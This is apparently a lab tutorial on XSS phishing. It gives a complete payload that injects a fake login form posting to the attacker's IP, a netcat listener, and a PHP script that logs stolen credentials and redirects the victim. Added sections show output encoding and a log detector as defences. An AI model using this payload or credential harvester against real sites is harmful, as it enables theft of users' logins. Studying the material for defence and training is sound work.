
XSS Phishing

Last updated 11 days ago

Login Form Injection

<h3>Please login to continue</h3>
<form action=http://10.10.14.146:8000>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

In the above HTML code, the form's action points at the IP of our VM (written as OUR_IP in the original exercise, 10.10.14.146 here), which we can find with the ip a command under tun0.

To write HTML code to the vulnerable page, we can use the JavaScript function document.write(), and use it in the XSS payload we found earlier in the XSS Discovery step. Once we minify our HTML code into a single line and add it inside the write function, the final JavaScript code should be as follows:

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

Cleaning Up

We can see that the URL field is still displayed, which defeats our line of "Please login to continue". So, to encourage the victim to use the login form, we should remove the URL field, such that they may think that they have to log in to be able to use the page. To do so, we can use the JavaScript function document.getElementById().remove().

To find the id of the HTML element we want to remove, we can open the Page Inspector Picker by pressing [CTRL+SHIFT+C] and then clicking on the element we need:

As we see in both the source code and the hover text, the url form has the id urlform:

<form role="form" action="index.php" method="GET" id='urlform'>
    <input type="text" placeholder="Image URL" name="url">
</form>

So, we can now use this id with the remove() function to remove the URL form:

document.getElementById('urlform').remove();

Now, once we add this code to our previous JavaScript code (after the document.write function), we can use this new JavaScript code in our payload:

document.write('<h3>Please login to continue</h3><form action=http://10.10.14.146:8000><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

Finally, we wrap the code in <script></script> tags, prefix it with '> to close the attribute and tag the input is reflected into, and append <!-- to comment out the rest of the original page:

'><script>document.write('<h3>Please login to continue</h3><form action="http://10.10.14.146:8000"><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById("urlform")?.remove();</script><!--
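As an added example that is not part of these notes: the payload above only works because the page reflects the url parameter into an HTML attribute without encoding it. The snippet below contrasts an assumed vulnerable template with an attribute-encoded one (the template, the renderUnsafe/renderSafe names and the shortened probe string are assumptions for this demo):

```javascript
// Added example (not from the original notes): why the '> break-out works and how
// attribute-context output encoding neutralises it. Template and names are assumed.

// Encode a string for safe placement inside a quoted HTML attribute value.
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"'`=\/]/g, (ch) => "&#" + ch.charCodeAt(0) + ";");
}

// Assumed template of the vulnerable image-URL form (id matches the page: urlform).
// The url parameter is concatenated straight into the value attribute.
function renderUnsafe(url) {
  return `<form role="form" action="index.php" method="GET" id='urlform'>` +
         `<input type="text" placeholder="Image URL" name="url" value='${url}'>` +
         `</form>`;
}

// Hardened version: the same template, but the reflected value is encoded first.
function renderSafe(url) {
  return `<form role="form" action="index.php" method="GET" id='urlform'>` +
         `<input type="text" placeholder="Image URL" name="url" value='${encodeForHtmlAttribute(url)}'>` +
         `</form>`;
}

// Constructed probe using the same structure as the payload on this page: close the
// attribute and tag, inject a script element, comment out the remainder of the page.
const probe = "'><script>alert(1)</script><!--";

// True when the rendered HTML contains an injected script element.
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

function demo() {
  return {
    unsafe: containsInjectedScript(renderUnsafe(probe)), // true: attribute broken out of
    safe: containsInjectedScript(renderSafe(probe)),     // false: payload stays inert text
  };
}
```

A Content-Security-Policy that forbids inline script adds a second layer: even if encoding is missed somewhere, the injected <script> block would not execute.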

Credential Stealing

To capture the submitted credentials, we can start listening on port 80 in our Pwnbox, as follows:

eldeim@htb[/htb]$ sudo nc -lvnp 80
listening on [any] 80 ...

Now, let's attempt to login with the credentials test:test, and check the netcat output we get (don't forget to replace OUR_IP in the XSS payload with your actual IP):

connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
...SNIP...

As we can see, we can capture the credentials in the HTTP request URL (/?username=test&password=test). If any victim attempts to log in with the form, we will get their credentials.

However, as we are only listening with a netcat listener, it will not handle the HTTP request correctly, and the victim would get an Unable to connect error, which may raise some suspicions.

The following PHP script should do what we need. We will write it to a file on our VM that we'll call index.php and place it in /tmp/tmpserver/ (don't forget to replace SERVER_IP with the IP from our exercise):

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

Now that we have our index.php file ready, we can start a PHP listening server, which we can use instead of the basic netcat listener we used earlier:

eldeim@htb[/htb]$ mkdir /tmp/tmpserver
eldeim@htb[/htb]$ cd /tmp/tmpserver
eldeim@htb[/htb]$ vi index.php #at this step we wrote our index.php file
eldeim@htb[/htb]$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
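From the defender's side, the request captured above (username and password travelling as GET query parameters to a host the application never talks to) is a recognisable shape in proxy logs. The detector below is an added example, not part of these notes; its log format, host allowlist and sample lines are constructed assumptions:

```javascript
// Added example (not from the original notes): flag credential-bearing query strings
// sent to hosts outside the application's known origin. Log format, allowlist and
// sample lines are constructed for this demo.

const KNOWN_HOSTS = new Set(["app.example.internal"]); // assumed legitimate origin
const CRED_PARAMS = new Set(["username", "user", "password", "passwd", "pass", "pwd"]);

// Parse one constructed proxy log line: "<ts> <client_ip> <method> <url> <status>"
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$/);
  if (!m) return null;
  return { ts: m[1], client: m[2], method: m[3], url: new URL(m[4]), status: m[5] };
}

// Report requests whose query string carries credential-looking parameter names
// and whose destination host is not on the allowlist.
function findCredentialLeaks(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const leaked = [...rec.url.searchParams.keys()]
      .filter((k) => CRED_PARAMS.has(k.toLowerCase()));
    if (leaked.length > 0 && !KNOWN_HOSTS.has(rec.url.hostname)) {
      hits.push({ ts: rec.ts, client: rec.client, host: rec.url.hostname, params: leaked });
    }
  }
  return hits;
}

// Constructed sample lines: a normal image-URL request, the exfiltration request shape
// shown on this page (203.0.113.10 is a documentation address), and a legitimate login
// whose credentials travel in the POST body rather than the query string.
const SAMPLE_LOG = [
  "2024-01-01T10:00:00Z 10.0.0.5 GET http://app.example.internal/index.php?url=http://img.example.internal/a.png 200",
  "2024-01-01T10:00:07Z 10.0.0.5 GET http://203.0.113.10/?username=test&password=test&submit=Login 302",
  "2024-01-01T10:00:09Z 10.0.0.7 POST http://app.example.internal/login.php 302",
];
```

Running findCredentialLeaks(SAMPLE_LOG) returns a single hit for the 203.0.113.10 request; the 302 redirect the PHP script issues is exactly what keeps the victim from noticing, so the log entry is often the only trace.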